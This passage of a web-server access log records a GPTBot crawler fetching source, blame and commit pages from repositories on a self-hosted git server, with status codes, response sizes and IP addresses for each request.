[Length 10982] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" -[17/Feb/2026:13:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" -[17/Feb/2026:13:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12483] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" -[17/Feb/2026:13:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" -[17/Feb/2026:13:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" -[17/Feb/2026:13:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" -[17/Feb/2026:13:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets" -[17/Feb/2026:13:26:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services" -[17/Feb/2026:13:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/update_status.py" -[17/Feb/2026:13:26:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" -[17/Feb/2026:13:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13912] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components" -[17/Feb/2026:13:26:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/README.md" -[17/Feb/2026:13:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11888] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:13:26:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11306] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:13:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" -[17/Feb/2026:13:26:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" -[17/Feb/2026:13:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10467] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" -[17/Feb/2026:13:26:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" -[17/Feb/2026:13:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" -[17/Feb/2026:13:26:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" [Client 74.7.227.38] [Length 10953] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/README.md" -[17/Feb/2026:13:26:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata" [Client 74.7.227.38] [Length 64188] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" -[17/Feb/2026:13:26:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 188144] [Gzip 11.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" -[17/Feb/2026:13:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11212] [Gzip 4.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" -[17/Feb/2026:13:26:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" -[17/Feb/2026:13:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/tsconfig.json" -[17/Feb/2026:13:26:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 10383] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" -[17/Feb/2026:13:26:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" [Client 74.7.227.38] [Length 11576] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" -[17/Feb/2026:13:26:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues/new" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues" -[17/Feb/2026:13:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues/new" -[17/Feb/2026:13:26:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 26287] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js" -[17/Feb/2026:13:26:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/halfweekly" [Client 74.7.227.38] [Length 8592] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" -[17/Feb/2026:13:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 10862] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.tsx" -[17/Feb/2026:13:26:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" [Client 74.7.227.38] [Length 18816] [Gzip 9.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/mail_contact.py" -[17/Feb/2026:13:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" [Client 74.7.227.38] [Length 12479] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/update_status.py" -[17/Feb/2026:13:26:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project" [Client 74.7.227.38] [Length 9865] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a" -[17/Feb/2026:13:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" [Client 74.7.227.38] [Length 11576] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:13:26:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/quarterly" [Client 74.7.227.38] [Length 8582] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" -[17/Feb/2026:13:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" -[17/Feb/2026:13:26:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" [Client 74.7.227.38] [Length 10761] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" -[17/Feb/2026:13:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/Dockerfile" -[17/Feb/2026:13:26:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 29160] [Gzip 11.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:13:26:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 20912] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/i18n.js" -[17/Feb/2026:13:26:37 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" -[17/Feb/2026:13:26:38 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Services.tsx" -[17/Feb/2026:13:26:38 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" -[17/Feb/2026:13:26:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues" [Client 74.7.227.38] [Length 10093] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" -[17/Feb/2026:13:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" -[17/Feb/2026:13:26:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" [Client 74.7.227.38] [Length 10759] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" -[17/Feb/2026:13:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/Dockerfile" -[17/Feb/2026:13:26:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Hero.tsx" -[17/Feb/2026:13:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/About.tsx" -[17/Feb/2026:13:26:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Hero.tsx" -[17/Feb/2026:13:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/About.tsx" -[17/Feb/2026:13:26:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver.rss" [Client 74.7.227.38] [Length 2411] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" -[17/Feb/2026:13:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11500] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" -[17/Feb/2026:13:26:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10807] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 